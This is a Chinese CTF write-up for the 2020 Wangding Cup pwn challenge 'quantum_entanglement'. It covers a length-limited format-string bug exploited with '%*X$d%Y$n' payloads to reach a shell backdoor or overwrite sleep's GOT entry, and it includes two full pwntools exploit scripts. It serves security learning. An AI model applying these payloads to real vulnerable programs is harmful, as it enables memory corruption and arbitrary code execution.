[pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp

30 篇文章 3 订阅
25 篇文章 4 订阅

[pwn]星号格式化串:2020网鼎杯白虎组pwn quantum_entanglement wp


还是一个比较有意思的个格式化串题目,限制了输入长度,需要使用星号的格式化串完成利用。

题目分析

题目名字:量子纠缠,实际没啥关系,强行起名,首先查看安全策略:
在这里插入图片描述
没有PIE,程序的逻辑就让你输入first name和last name,然后就输出了:
在这里插入图片描述
然后逆向分析题目:

没办法直接F5,在scanf的地方会报个分析异常,是参数引起的,可以选择把这句nop掉然后f5 分析:
在这里插入图片描述
程序main函数中先取两个随机值,放在栈上,然后注意我画圈的地方,它把其中一个随机值的后半段地址留在了栈上。在你输入完first name和last name之后,会进行一个login函数,里面有格式化串漏洞,接下来会判断开始存放在栈上的两个随机值是否相等(正常肯定是不相等的),相等的话,会有一个system(’/bin/bash’)奖励:
在这里插入图片描述
在login函数中,存在两个格式化串漏洞,但每个限制最大13个字符(输入的时候限制的):
在这里插入图片描述
在这里插入图片描述

利用方法1

这里用到了一个知识点,%*X$d%Y$n会把栈中偏移X处的赋给栈中偏移Y处的指针指向的地址。类似的题目是MidnightsunCTF Quals 2020 pwn4(感谢队内大佬点拨)

所以利用思路就是:

  1. 确定栈中的半个随机数A指针的偏移M和随机数B的偏移N
  2. 找到一个栈中的地址A指向栈中地址B指向栈中地址C的栈指针链
  3. 确定栈中地址A的偏移和栈中地址B的偏移(假设分别为X和Y)
  4. 然后利用两个payload'%*M$d%X$hn''%*N$c%Y$n'完成利用

然后我们看一下在格式化字符串的时候的栈结构:

b * 0x804876A断在格式化字符串触发的时候,然后看栈结构:
在这里插入图片描述
所以,步骤中的M和N就分别是19和18。然后需要找一个栈->栈->栈的栈指针链,这个需要在栈的非常靠下的位置找到:
在这里插入图片描述
图中的三个都可以,我这里用的第一个,然后计算一下偏移:
在这里插入图片描述
然后写出exp:

from pwn import * 
context.terminal=['tmux','splitw','-h']
p=process("./quantum_entanglement")

payload1 = '%*19$d%65$hn'
payload2 = '%*18$c%118$n'
#gdb.attach(p)

p.recv()
p.sendline(payload1)
p.recv()
p.sendline(payload2)
p.interactive()

由于中间有一个sleep(3),可能会睡3秒。而且%※这个格式化串是输出对应值数量的空格,每次随机值不同,可能输出的时间不同,但一般是几秒钟。
在这里插入图片描述

利用方法2

由于格式化串到后门之间还执行了一个sleep,所以我们可以修改sleep的got表。手段和上面一样,同样是使用%*X$d%Y$n将sleep的got表覆盖,然后将got表修改为后门的地址处。

  1. 找到输入的first name和last name在栈中的偏移X 和Y
  2. 获得sleep.got和backdoor的地址
  3. 通过两个payloadp32(sleepgot)+p32(backdoor)'%*Y$c%X$n完成利用

最后找到偏移分别是20和21,exp如下:

from pwn import * 
context.terminal=['tmux','splitw','-h']
p=process("./quantum_entanglement")
elf=ELF("./quantum_entanglement")

sleepgot=elf.got['sleep']
backdoor=0x080489DB

payload1=p32(sleepgot)+p32(backdoor)
payload2 = '%*21$c' + '%20$n'
#gdb.attach(p)

p.recv()
p.sendline(payload1)
p.recv()
p.sendline(payload2)
p.interactive()

然后这种方法相比前一种方法,执行时间要长的多,因为写的是一个地址,要输出上G的空格。。。。
在这里插入图片描述
运行了将近两分钟。。。。

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值